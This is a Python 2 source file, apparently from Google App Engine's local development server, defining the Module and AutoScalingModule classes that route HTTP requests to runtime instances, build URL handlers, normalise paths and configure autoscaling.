class InteractiveCommandError(errors.Error):
pass
class _ScriptHandler(url_handler.UserConfiguredURLHandler):
"""A URL handler that will cause the request to be dispatched to an instance.
This handler is special in that it does not have a working handle() method
since the Module's dispatch logic is used to select the appropriate Instance.
"""
def __init__(self, url_map):
"""Initializer for _ScriptHandler.
Args:
url_map: An appinfo.URLMap instance containing the configuration for this
handler.
"""
try:
url_pattern = re.compile('%s$' % url_map.url)
except re.error, e:
raise errors.InvalidAppConfigError(
'invalid url %r in script handler: %s' % (url_map.url, e))
super(_ScriptHandler, self).__init__(url_map, url_pattern)
self.url_map = url_map
def handle(self, match, environ, start_response):
"""This is a dummy method that should never be called."""
raise NotImplementedError()
class Module(object):
"""The abstract base for all instance pool implementations."""
_RUNTIME_INSTANCE_FACTORIES = {
'go': go_runtime.GoRuntimeInstanceFactory,
'php': php_runtime.PHPRuntimeInstanceFactory,
'python': python_runtime.PythonRuntimeInstanceFactory,
'python27': python_runtime.PythonRuntimeInstanceFactory,
# TODO: uncomment for GA.
# 'vm': vm_runtime_factory.VMRuntimeInstanceFactory,
}
if java_runtime:
_RUNTIME_INSTANCE_FACTORIES.update({
'java': java_runtime.JavaRuntimeInstanceFactory,
'java7': java_runtime.JavaRuntimeInstanceFactory,
})
_MAX_REQUEST_WAIT_TIME = 10
def _get_wait_time(self):
"""Gets the wait time before timing out a request.
Returns:
The timeout value in seconds.
"""
if self.vm_enabled():
return self._MAX_REQUEST_WAIT_TIME * _VMENGINE_SLOWDOWN_FACTOR
return self._MAX_REQUEST_WAIT_TIME
def _create_instance_factory(self,
module_configuration):
"""Create an instance.InstanceFactory.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
Returns:
      An instance.InstanceFactory subclass that can be used to create instances
with the provided configuration.
Raises:
RuntimeError: if the configuration specifies an unknown runtime.
"""
# TODO: a bad runtime should be caught before we get here.
if module_configuration.runtime not in self._RUNTIME_INSTANCE_FACTORIES:
raise RuntimeError(
'Unknown runtime %r; supported runtimes are %s.' %
(module_configuration.runtime,
', '.join(
sorted(repr(k) for k in self._RUNTIME_INSTANCE_FACTORIES))))
instance_factory = self._RUNTIME_INSTANCE_FACTORIES[
module_configuration.runtime]
return instance_factory(
request_data=self._request_data,
runtime_config_getter=self._get_runtime_config,
module_configuration=module_configuration)
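  # Descriptive note (not in the upstream source): the lookup above is a plain
  # dictionary mapping, e.g. runtime 'python27' selects
  # python_runtime.PythonRuntimeInstanceFactory, while an unknown runtime such
  # as a hypothetical 'ruby' raises RuntimeError listing the supported keys.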
def _create_url_handlers(self):
"""Constructs URLHandlers based on the module configuration.
Returns:
      A list of url_handler.URLHandlers that can react as described in the
      given configuration.
"""
handlers = []
# Add special URL handlers (taking precedence over user-defined handlers)
url_pattern = '/%s$' % login.LOGIN_URL_RELATIVE
handlers.append(wsgi_handler.WSGIHandler(login.application,
url_pattern))
url_pattern = '/%s' % blob_upload.UPLOAD_URL_PATH
# The blobstore upload handler forwards successful requests back to self
handlers.append(
wsgi_handler.WSGIHandler(blob_upload.Application(self), url_pattern))
url_pattern = '/%s' % blob_image.BLOBIMAGE_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(blob_image.Application(), url_pattern))
url_pattern = '/%s' % channel.CHANNEL_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(channel.application, url_pattern))
url_pattern = '/%s' % gcs_server.GCS_URL_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(gcs_server.Application(), url_pattern))
url_pattern = '/%s' % endpoints.API_SERVING_PATTERN
handlers.append(
wsgi_handler.WSGIHandler(
endpoints.EndpointsDispatcher(self._dispatcher), url_pattern))
found_start_handler = False
found_warmup_handler = False
# Add user-defined URL handlers
for url_map in self._module_configuration.handlers:
handler_type = url_map.GetHandlerType()
if handler_type == appinfo.HANDLER_SCRIPT:
handlers.append(_ScriptHandler(url_map))
if not found_start_handler and re.match('%s$' % url_map.url,
'/_ah/start'):
found_start_handler = True
if not found_warmup_handler and re.match('%s$' % url_map.url,
'/_ah/warmup'):
found_warmup_handler = True
elif handler_type == appinfo.STATIC_FILES:
handlers.append(
static_files_handler.StaticFilesHandler(
self._module_configuration.application_root,
url_map))
elif handler_type == appinfo.STATIC_DIR:
handlers.append(
static_files_handler.StaticDirHandler(
self._module_configuration.application_root,
url_map))
else:
assert 0, 'unexpected handler %r for %r' % (handler_type, url_map)
# Add a handler for /_ah/start if no script handler matches.
if not found_start_handler:
handlers.insert(0, _ScriptHandler(self._instance_factory.START_URL_MAP))
# Add a handler for /_ah/warmup if no script handler matches and warmup is
# enabled.
if (not found_warmup_handler and
'warmup' in (self._module_configuration.inbound_services or [])):
handlers.insert(0, _ScriptHandler(self._instance_factory.WARMUP_URL_MAP))
return handlers
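  # Descriptive note (not in the upstream source): the special /_ah/* handlers
  # above always precede user-defined handlers, user handlers keep their
  # app.yaml order, and the synthetic /_ah/start and /_ah/warmup script
  # handlers are inserted at the very front only when no user handler already
  # matches those paths.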
def _get_runtime_config(self):
"""Returns the configuration for the runtime.
Returns:
A runtime_config_pb2.Config instance representing the configuration to be
passed to an instance. NOTE: This does *not* include the instance_id
field, which must be populated elsewhere.
"""
runtime_config = runtime_config_pb2.Config()
runtime_config.app_id = self._module_configuration.application
runtime_config.version_id = self._module_configuration.version_id
if self._threadsafe_override is None:
runtime_config.threadsafe = self._module_configuration.threadsafe or False
else:
runtime_config.threadsafe = self._threadsafe_override
runtime_config.application_root = (
self._module_configuration.application_root)
if not self._allow_skipped_files:
runtime_config.skip_files = str(self._module_configuration.skip_files)
runtime_config.static_files = _static_files_regex_from_handlers(
self._module_configuration.handlers)
runtime_config.api_host = self._api_host
runtime_config.api_port = self._api_port
runtime_config.server_port = self._balanced_port
runtime_config.stderr_log_level = self._runtime_stderr_loglevel
runtime_config.datacenter = 'us1'
runtime_config.auth_domain = self._auth_domain
if self._max_instances is not None:
runtime_config.max_instances = self._max_instances
for library in self._module_configuration.normalized_libraries:
runtime_config.libraries.add(name=library.name, version=library.version)
for key, value in (self._module_configuration.env_variables or {}).items():
runtime_config.environ.add(key=str(key), value=str(value))
if self._cloud_sql_config:
runtime_config.cloud_sql_config.CopyFrom(self._cloud_sql_config)
if self._php_config and self._module_configuration.runtime == 'php':
runtime_config.php_config.CopyFrom(self._php_config)
if (self._python_config and
self._module_configuration.runtime.startswith('python')):
runtime_config.python_config.CopyFrom(self._python_config)
if (self._java_config and
self._module_configuration.runtime.startswith('java')):
runtime_config.java_config.CopyFrom(self._java_config)
if self._vm_config:
runtime_config.vm_config.CopyFrom(self._vm_config)
return runtime_config
def _maybe_restart_instances(self, config_changed, file_changed):
"""Restarts instances. May avoid some restarts depending on policy.
One of config_changed or file_changed must be True.
Args:
config_changed: True if the configuration for the application has changed.
file_changed: True if any file relevant to the application has changed.
"""
if not config_changed and not file_changed:
return
logging.debug('Restarting instances.')
policy = self._instance_factory.FILE_CHANGE_INSTANCE_RESTART_POLICY
assert policy is not None, 'FILE_CHANGE_INSTANCE_RESTART_POLICY not set'
with self._condition:
instances_to_quit = set()
for inst in self._instances:
if (config_changed or
(policy == instance.ALWAYS) or
(policy == instance.AFTER_FIRST_REQUEST and inst.total_requests)):
instances_to_quit.add(inst)
self._instances -= instances_to_quit
for inst in instances_to_quit:
inst.quit(allow_async=True)
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
file_changes = self._watcher.changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if file_changes:
logging.info(
'Detected file changes:\n %s', '\n '.join(sorted(file_changes)))
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
self._maybe_restart_instances(
config_changed=bool(config_changes & _RESTART_INSTANCES_CONFIG_CHANGES),
file_changed=bool(file_changes))
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for Module.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIModule listens for RPC requests on.
api_port: The port that APIModule listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
      runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
      php_config: A runtime_config_pb2.PhpConfig instance containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are used.
java_config: A runtime_config_pb2.JavaConfig instance containing
Java runtime-specific configuration. If None then defaults are used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
vm_config: A runtime_config_pb2.VMConfig instance containing
VM runtime-specific configuration. If None all docker-related stuff
is disabled.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
          file or configuration change that affects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
self._module_configuration = module_configuration
self._name = module_configuration.module_name
self._version = module_configuration.major_version
self._app_name_external = module_configuration.application_external_name
self._host = host
self._api_host = api_host
self._api_port = api_port
self._auth_domain = auth_domain
self._runtime_stderr_loglevel = runtime_stderr_loglevel
self._balanced_port = balanced_port
self._php_config = php_config
self._python_config = python_config
self._java_config = java_config
self._cloud_sql_config = cloud_sql_config
self._vm_config = vm_config
self._request_data = request_data
self._allow_skipped_files = allow_skipped_files
self._threadsafe_override = threadsafe_override
self._dispatcher = dispatcher
self._max_instances = max_instances
self._automatic_restarts = automatic_restarts
self._use_mtime_file_watcher = use_mtime_file_watcher
self._default_version_port = default_version_port
self._port_registry = port_registry
if self.vm_enabled():
self._RUNTIME_INSTANCE_FACTORIES['vm'] = (
vm_runtime_factory.VMRuntimeInstanceFactory)
self._instance_factory = self._create_instance_factory(
self._module_configuration)
if self._automatic_restarts:
self._watcher = file_watcher.get_file_watcher(
[self._module_configuration.application_root] +
self._instance_factory.get_restart_directories(),
self._use_mtime_file_watcher)
else:
self._watcher = None
self._handler_lock = threading.Lock()
self._handlers = self._create_url_handlers()
self._balanced_module = wsgi_server.WsgiServer(
(self._host, self._balanced_port), self)
self._quit_event = threading.Event() # Set when quit() has been called.
def vm_enabled(self):
# TODO: change when GA
return self._vm_config
@property
def name(self):
"""The name of the module, as defined in app.yaml.
    This value will be constant for the lifetime of the module even if the
module configuration changes.
"""
return self._name
@property
def version(self):
"""The version of the module, as defined in app.yaml.
    This value will be constant for the lifetime of the module even if the
module configuration changes.
"""
return self._version
@property
def app_name_external(self):
"""The external application name of the module, as defined in app.yaml.
    This value will be constant for the lifetime of the module even if the
module configuration changes.
"""
return self._app_name_external
@property
def ready(self):
"""The module is ready to handle HTTP requests."""
return self._balanced_module.ready
@property
def balanced_port(self):
"""The port that the balanced HTTP server for the Module is listening on."""
assert self._balanced_module.ready, 'balanced module not running'
return self._balanced_module.port
@property
def host(self):
"""The host that the HTTP server(s) for this Module is listening on."""
return self._host
@property
def balanced_address(self):
"""The address of the balanced HTTP server e.g. "localhost:8080"."""
if self.balanced_port != 80:
return '%s:%s' % (self.host, self.balanced_port)
else:
return self.host
@property
def max_instance_concurrent_requests(self):
"""The number of concurrent requests that each Instance can handle."""
return self._instance_factory.max_concurrent_requests
@property
def module_configuration(self):
"""The application_configuration.ModuleConfiguration for this module."""
return self._module_configuration
@property
def runtime(self):
"""Runtime property for this module."""
return self._module_configuration.runtime
@property
def effective_runtime(self):
"""Effective_runtime property for this module."""
return self._module_configuration.effective_runtime
@property
def supports_interactive_commands(self):
"""True if the module can evaluate arbitrary code and return the result."""
return self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
inst=None):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
inst: The Instance to send the request to. If None then an appropriate
Instance will be chosen.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
raise NotImplementedError()
def _no_handler_for_request(self, environ, start_response, request_id):
"""Handle a HTTP request that does not match any user-defined handlers."""
self._insert_log_message('No handlers matched this URL.', 2, request_id)
start_response('404 Not Found', [('Content-Type', 'text/plain')])
return ['The url "%s" does not match any handlers.' % environ['PATH_INFO']]
def _error_response(self, environ, start_response, status, body=None):
if body:
start_response(
'%d %s' % (status, httplib.responses[status]),
[('Content-Type', 'text/html'),
('Content-Length', str(len(body)))])
return body
start_response('%d %s' % (status, httplib.responses[status]), [])
return []
def _handle_request(self, environ, start_response, inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
inst: The Instance to send the request to. If None then an appropriate
Instance will be chosen. Setting inst is not meaningful if the
request does not match a "script" handler.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if inst:
try:
environ['SERVER_PORT'] = str(self.get_instance_port(inst.instance_id))
except request_info.NotSupportedWithAutoScalingError:
environ['SERVER_PORT'] = str(self.balanced_port)
else:
environ['SERVER_PORT'] = str(self.balanced_port)
if 'HTTP_HOST' in environ:
environ['SERVER_NAME'] = environ['HTTP_HOST'].split(':', 1)[0]
environ['DEFAULT_VERSION_HOSTNAME'] = '%s:%s' % (
environ['SERVER_NAME'], self._default_version_port)
with self._request_data.request(
environ,
self._module_configuration) as request_id:
should_log_request = not _REQUEST_LOGGING_BLACKLIST_RE.match(
environ['PATH_INFO'])
environ['REQUEST_ID_HASH'] = self.generate_request_id_hash()
if should_log_request:
environ['REQUEST_LOG_ID'] = self.generate_request_log_id()
if 'HTTP_HOST' in environ:
hostname = environ['HTTP_HOST']
elif environ['SERVER_PORT'] == '80':
hostname = environ['SERVER_NAME']
else:
hostname = '%s:%s' % (environ['SERVER_NAME'], environ['SERVER_PORT'])
if environ.get('QUERY_STRING'):
resource = '%s?%s' % (urllib.quote(environ['PATH_INFO']),
environ['QUERY_STRING'])
else:
resource = urllib.quote(environ['PATH_INFO'])
email, _, _ = login.get_user_info(environ.get('HTTP_COOKIE', ''))
method = environ.get('REQUEST_METHOD', 'GET')
http_version = environ.get('SERVER_PROTOCOL', 'HTTP/1.0')
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
logservice.start_request(
request_id=request_id,
user_request_id=environ['REQUEST_LOG_ID'],
ip=environ.get('REMOTE_ADDR', ''),
app_id=self._module_configuration.application,
version_id=self._module_configuration.major_version,
nickname=email.split('@', 1)[0],
user_agent=environ.get('HTTP_USER_AGENT', ''),
host=hostname,
method=method,
resource=resource,
http_version=http_version,
module=self._module_configuration.module_name)
def wrapped_start_response(status, response_headers, exc_info=None):
response_headers.append(('Server',
http_runtime_constants.SERVER_SOFTWARE))
if should_log_request:
headers = wsgiref.headers.Headers(response_headers)
status_code = int(status.split(' ', 1)[0])
content_length = int(headers.get('Content-Length', 0))
logservice.end_request(request_id, status_code, content_length)
logging.info('%(module_name)s: '
'"%(method)s %(resource)s %(http_version)s" '
'%(status)d %(content_length)s',
{'module_name': self.name,
'method': method,
'resource': resource,
'http_version': http_version,
'status': status_code,
'content_length': content_length or '-'})
return start_response(status, response_headers, exc_info)
content_length = int(environ.get('CONTENT_LENGTH', '0'))
if (environ['REQUEST_METHOD'] in ('GET', 'HEAD', 'DELETE', 'TRACE') and
content_length != 0):
# CONTENT_LENGTH may be empty or absent.
wrapped_start_response('400 Bad Request', [])
return ['"%s" requests may not contain bodies.' %
environ['REQUEST_METHOD']]
# Do not apply request limits to internal _ah handlers (known to break
# blob uploads).
# TODO: research if _ah handlers need limits.
if (not environ.get('REQUEST_URI', '/').startswith('/_ah/') and
content_length > _MAX_UPLOAD_BYTES):
# As allowed by the RFC, cherrypy closes the connection for 413 errors.
# Most clients do not handle this correctly and treat the page as
# unavailable if the connection is closed before the client can send
# all the data. To match the behavior of production, for large files
# < 64M read the data to prevent the client bug from being triggered.
if content_length <= _MAX_UPLOAD_NO_TRIGGER_BAD_CLIENT_BYTES:
environ['wsgi.input'].read(content_length)
status = '%d %s' % (httplib.REQUEST_ENTITY_TOO_LARGE,
httplib.responses[httplib.REQUEST_ENTITY_TOO_LARGE])
wrapped_start_response(status, [])
return ['Upload limited to %d megabytes.' % _MAX_UPLOAD_MEGABYTES]
with self._handler_lock:
handlers = self._handlers
try:
path_info = environ['PATH_INFO']
path_info_normal = self._normpath(path_info)
if path_info_normal != path_info:
# While a 301 Moved Permanently makes more sense for non-normal
# paths, prod issues a 302 so we do the same.
return self._redirect_302_path_info(path_info_normal,
environ,
wrapped_start_response)
if request_type in (instance.BACKGROUND_REQUEST,
instance.INTERACTIVE_REQUEST,
instance.SHUTDOWN_REQUEST):
app = functools.partial(self._handle_script_request,
url_map=_DUMMY_URLMAP,
match=_EMPTY_MATCH,
request_id=request_id,
inst=inst,
request_type=request_type)
return request_rewriter.frontend_rewriter_middleware(app)(
environ, wrapped_start_response)
for handler in handlers:
match = handler.match(path_info)
if match:
auth_failure = handler.handle_authorization(environ,
wrapped_start_response)
if auth_failure is not None:
return auth_failure
if isinstance(handler, _ScriptHandler):
app = functools.partial(self._handle_script_request,
url_map=handler.url_map,
match=match,
request_id=request_id,
inst=inst,
request_type=request_type)
return request_rewriter.frontend_rewriter_middleware(app)(
environ, wrapped_start_response)
else:
return handler.handle(match, environ, wrapped_start_response)
return self._no_handler_for_request(environ, wrapped_start_response,
request_id)
except StandardError, e:
logging.exception('Request to %r failed', path_info)
wrapped_start_response('500 Internal Server Error', [], e)
return []
def _async_shutdown_instance(self, inst, port):
return _THREAD_POOL.submit(self._shutdown_instance, inst, port)
def _shutdown_instance(self, inst, port):
force_shutdown_time = time.time() + _SHUTDOWN_TIMEOUT
try:
environ = self.build_request_environ(
'GET', '/_ah/stop', [], '', '0.1.0.3', port, fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.SHUTDOWN_REQUEST)
logging.debug('Sent shutdown request: %s', inst)
except:
logging.exception('Internal error while handling shutdown request.')
finally:
time_to_wait = force_shutdown_time - time.time()
self._quit_event.wait(time_to_wait)
inst.quit(force=True)
@staticmethod
def _quote_querystring(qs):
"""Quote a query string to protect against XSS."""
parsed_qs = urlparse.parse_qs(qs, keep_blank_values=True)
    # urlparse.parse_qs returns a dictionary whose values are lists, while
    # urllib.urlencode does not handle lists. Expand the dictionary into a
    # list of (key, value) pairs.
expanded_qs = []
for key, multivalue in parsed_qs.items():
for value in multivalue:
expanded_qs.append((key, value))
return urllib.urlencode(expanded_qs)
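  # Illustrative example (not in the upstream source):
  #   Module._quote_querystring('q=a b&q=<x>')  => 'q=a+b&q=%3Cx%3E'
  # Repeated values for one key are preserved; the relative order of distinct
  # keys follows dict iteration order, so it may differ from the original
  # query string.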
def _redirect_302_path_info(self, updated_path_info, environ, start_response):
"""Redirect to an updated path.
Respond to the current request with a 302 Found status with an updated path
but preserving the rest of the request.
Notes:
- WSGI does not make the fragment available so we are not able to preserve
it. Luckily prod does not preserve the fragment so it works out.
Args:
updated_path_info: the new HTTP path to redirect to.
environ: WSGI environ object.
start_response: WSGI start response callable.
Returns:
WSGI-compatible iterable object representing the body of the response.
"""
correct_url = urlparse.urlunsplit(
(environ['wsgi.url_scheme'],
environ['HTTP_HOST'],
urllib.quote(updated_path_info),
self._quote_querystring(environ['QUERY_STRING']),
None))
content_type = 'text/html; charset=utf-8'
output = _REDIRECT_HTML % {
'content-type': content_type,
'status': httplib.FOUND,
'correct-url': correct_url
}
start_response('%d %s' % (httplib.FOUND, httplib.responses[httplib.FOUND]),
[('Content-Type', content_type),
('Location', correct_url),
('Content-Length', str(len(output)))])
return output
@staticmethod
def _normpath(path):
"""Normalize the path by handling . and .. directory entries.
Normalizes the path. A directory entry of . is just dropped while a
directory entry of .. removes the previous entry. Note that unlike
os.path.normpath, redundant separators remain in place to match prod.
Args:
path: an HTTP path.
Returns:
A normalized HTTP path.
"""
normalized_path_entries = []
for entry in path.split('/'):
if entry == '..':
if normalized_path_entries:
normalized_path_entries.pop()
elif entry != '.':
normalized_path_entries.append(entry)
return '/'.join(normalized_path_entries)
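  # Illustrative examples (not in the upstream source):
  #   Module._normpath('/foo/./bar/../baz')  => '/foo/baz'
  #   Module._normpath('/foo//bar')          => '/foo//bar'
  # Redundant separators are intentionally kept, unlike os.path.normpath, to
  # match production behaviour.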
def _insert_log_message(self, message, level, request_id):
logs_group = log_service_pb.UserAppLogGroup()
log_line = logs_group.add_log_line()
log_line.set_timestamp_usec(int(time.time() * 1e6))
log_line.set_level(level)
log_line.set_message(message)
request = log_service_pb.FlushRequest()
request.set_logs(logs_group.Encode())
response = api_base_pb.VoidProto()
logservice = apiproxy_stub_map.apiproxy.GetStub('logservice')
logservice._Dynamic_Flush(request, response, request_id)
@staticmethod
def generate_request_log_id():
"""Generate a random REQUEST_LOG_ID.
Returns:
A string suitable for use as a REQUEST_LOG_ID. The returned string is
variable length to emulate the production values, which encapsulate
the application id, version and some log state.
"""
return ''.join(random.choice(_LOWER_HEX_DIGITS)
for _ in range(random.randrange(30, 100)))
@staticmethod
def generate_request_id_hash():
"""Generate a random REQUEST_ID_HASH."""
return ''.join(random.choice(_UPPER_HEX_DIGITS)
for _ in range(_REQUEST_ID_HASH_LENGTH))
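  # Illustrative values only (not in the upstream source):
  #   generate_request_log_id()   returns 30-99 lowercase hex digits,
  #                               e.g. '6af7e1b29c...'
  #   generate_request_id_hash()  always returns 8 uppercase hex digits,
  #                               e.g. '3F2A9C1B'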
def set_num_instances(self, instances):
"""Sets the number of instances for this module to run.
Args:
instances: An int containing the number of instances to run.
Raises:
request_info.NotSupportedWithAutoScalingError: Always.
"""
raise request_info.NotSupportedWithAutoScalingError()
def get_num_instances(self):
"""Returns the number of instances for this module to run."""
raise request_info.NotSupportedWithAutoScalingError()
def suspend(self):
"""Stops the module from serving requests."""
raise request_info.NotSupportedWithAutoScalingError()
def resume(self):
"""Restarts the module."""
raise request_info.NotSupportedWithAutoScalingError()
def get_instance_address(self, instance_id):
"""Returns the address of the HTTP server for an instance."""
return '%s:%s' % (self.host, self.get_instance_port(instance_id))
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
raise request_info.NotSupportedWithAutoScalingError()
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
raise request_info.NotSupportedWithAutoScalingError()
@property
def supports_individually_addressable_instances(self):
return False
def create_interactive_command_module(self):
"""Returns a InteractiveCommandModule that can be sent user commands."""
if self._instance_factory.SUPPORTS_INTERACTIVE_REQUESTS:
return InteractiveCommandModule(self._module_configuration,
self._host,
self._balanced_port,
self._api_host,
self._api_port,
self._auth_domain,
self._runtime_stderr_loglevel,
self._php_config,
self._python_config,
self._java_config,
self._cloud_sql_config,
self._vm_config,
self._default_version_port,
self._port_registry,
self._request_data,
self._dispatcher,
self._use_mtime_file_watcher,
self._allow_skipped_files,
self._threadsafe_override)
else:
raise NotImplementedError('runtime does not support interactive commands')
def build_request_environ(self, method, relative_url, headers, body,
source_ip, port, fake_login=False):
if isinstance(body, unicode):
body = body.encode('ascii')
url = urlparse.urlsplit(relative_url)
if port != 80:
host = '%s:%s' % (self.host, port)
else:
host = self.host
environ = {constants.FAKE_IS_ADMIN_HEADER: '1',
'CONTENT_LENGTH': str(len(body)),
'PATH_INFO': url.path,
'QUERY_STRING': url.query,
'REQUEST_METHOD': method,
'REMOTE_ADDR': source_ip,
'SERVER_NAME': self.host,
'SERVER_PORT': str(port),
'SERVER_PROTOCOL': 'HTTP/1.1',
'wsgi.version': (1, 0),
'wsgi.url_scheme': 'http',
'wsgi.errors': cStringIO.StringIO(),
'wsgi.multithread': True,
'wsgi.multiprocess': True,
'wsgi.input': cStringIO.StringIO(body)}
if fake_login:
environ[constants.FAKE_LOGGED_IN_HEADER] = '1'
util.put_headers_in_environ(headers, environ)
environ['HTTP_HOST'] = host
return environ
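  # Minimal usage sketch (not in the upstream source; assumes a started Module
  # instance named `module`, mirroring how _warmup() builds its request):
  #   environ = module.build_request_environ(
  #       'GET', '/_ah/warmup?probe=1', [('X-Custom', 'yes')], '',
  #       '0.1.0.3', module.balanced_port, fake_login=True)
  #   # environ['PATH_INFO'] == '/_ah/warmup'
  #   # environ['QUERY_STRING'] == 'probe=1'
  #   # the X-Custom header and the fake admin/login headers are copied in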
class AutoScalingModule(Module):
"""A pool of instances that is autoscaled based on traffic."""
# The minimum number of seconds to wait, after quitting an idle instance,
# before quitting another idle instance.
_MIN_SECONDS_BETWEEN_QUITS = 60
# The time horizon to use when calculating the number of instances required
# to serve the current level of traffic.
_REQUIRED_INSTANCE_WINDOW_SECONDS = 60
_DEFAULT_AUTOMATIC_SCALING = appinfo.AutomaticScaling(
min_pending_latency='0.1s',
max_pending_latency='0.5s',
min_idle_instances=1,
max_idle_instances=1000)
@staticmethod
def _parse_pending_latency(timing):
"""Parse a pending latency string into a float of the value in seconds.
Args:
timing: A str of the form 1.0s or 1000ms.
Returns:
A float representation of the value in seconds.
"""
if timing.endswith('ms'):
return float(timing[:-2]) / 1000
else:
return float(timing[:-1])
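  # Illustrative examples (not in the upstream source):
  #   AutoScalingModule._parse_pending_latency('250ms')  => 0.25
  #   AutoScalingModule._parse_pending_latency('0.5s')   => 0.5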
@classmethod
def _populate_default_automatic_scaling(cls, automatic_scaling):
for attribute in automatic_scaling.ATTRIBUTES:
if getattr(automatic_scaling, attribute) in ('automatic', None):
setattr(automatic_scaling, attribute,
getattr(cls._DEFAULT_AUTOMATIC_SCALING, attribute))
def _process_automatic_scaling(self, automatic_scaling):
if automatic_scaling:
self._populate_default_automatic_scaling(automatic_scaling)
else:
automatic_scaling = self._DEFAULT_AUTOMATIC_SCALING
self._min_pending_latency = self._parse_pending_latency(
automatic_scaling.min_pending_latency)
self._max_pending_latency = self._parse_pending_latency(
automatic_scaling.max_pending_latency)
self._min_idle_instances = int(automatic_scaling.min_idle_instances)
self._max_idle_instances = int(automatic_scaling.max_idle_instances)
def __init__(self,
module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
unused_vm_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override):
"""Initializer for AutoScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_host: The host that APIServer listens for RPC requests on.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
      runtime_stderr_loglevel: An int representing the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
      php_config: A runtime_config_pb2.PhpConfig instance containing PHP
runtime-specific configuration. If None then defaults are used.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are used.
java_config: A runtime_config_pb2.JavaConfig instance containing
Java runtime-specific configuration. If None then defaults are used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
unused_vm_config: A runtime_config_pb2.VMConfig instance containing
VM runtime-specific configuration. Ignored by AutoScalingModule as
autoscaling is not yet supported by VM runtimes.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
          file or configuration change that affects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
threadsafe_override: If not None, ignore the YAML file value of threadsafe
and use this value instead.
"""
super(AutoScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_host,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_config,
python_config,
java_config,
cloud_sql_config,
                                            # VM runtimes do not support
# autoscaling.
None,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
threadsafe_override)
self._process_automatic_scaling(
self._module_configuration.automatic_scaling)
self._instances = set() # Protected by self._condition.
    # A deque containing (time, num_outstanding_instance_requests) 2-tuples.
